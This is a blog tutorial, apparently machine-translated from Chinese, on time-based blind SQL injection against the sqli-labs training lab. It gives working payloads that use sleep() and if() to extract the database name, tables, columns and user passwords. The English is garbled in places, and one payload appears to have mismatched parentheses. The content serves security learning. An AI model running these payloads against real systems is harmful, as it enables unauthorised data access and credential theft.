Introduction: learning through the front nine before turning to echo injection, error injection, some methods such as Boolean blind, this time to study in detail the time the blinds .
In a previous blog, to understand the Boolean blind , in fact, Boolean blinds and time blinds roughly the same, the injection principle is the same, the difference is a still echoing , a complete no echo , by constructing statements by duration page response information to judge, this is the time the blinds.
First to learn about time Blind function needed
sleep()/延迟函数
if(condition,true,false)/若条件为真 返回true,若条件为假 返回false
substring("string",strart,length)
The main is that few, here it is by sqli-labs to practice blind tenth time off
Guess database name length
payload:
?id=1" and if(length(database())>5,1,sleep(10))--+
Execution fails here will sleep ten seconds faster judgments, of course, can also sleep()function on the implementation of a successful location.
The reactor browser to determine the length of the name of the database (if it is manually injected speed remember well, fun or else ...)
burst database name
payload:
?id=1" and if((ascii(substr(database(),1,1)))>120,1,sleep(10))--+
The reactor browser to guess the name of the database, in fact, time is beable to inject more than a blind if函数, sleep()function is equivalent to the Boolean blind in true或falsethe other statements are roughly the same.
Burst table name
payload:
?id=1" and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>120,1,sleep(10))--+
Browser is also observed reaction time, sleep 10 seconds if there is no table name is correct conditions, continue to try to
Column Name burst
payload:
?id=1" and if((ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))))>100,1,sleep(10))--+
Burst value
payload:
?id=1" and if((ascii(substr(( select password from users limit 0,1),1,1)))>1,1,sleep(10))--+
In fact, time can be seen in the blinds and blinds Boolean statement is basically the same, but is blind to perform a sleep time function if statements to judge. If you understand the Boolean blind, blind time is also well understood.
But still best to write about the script, the low injection efficiency and error-prone manual. The study on the first here to learn about the time the blinds, until the scripting capabilities improve, and he wrote a script to run it.
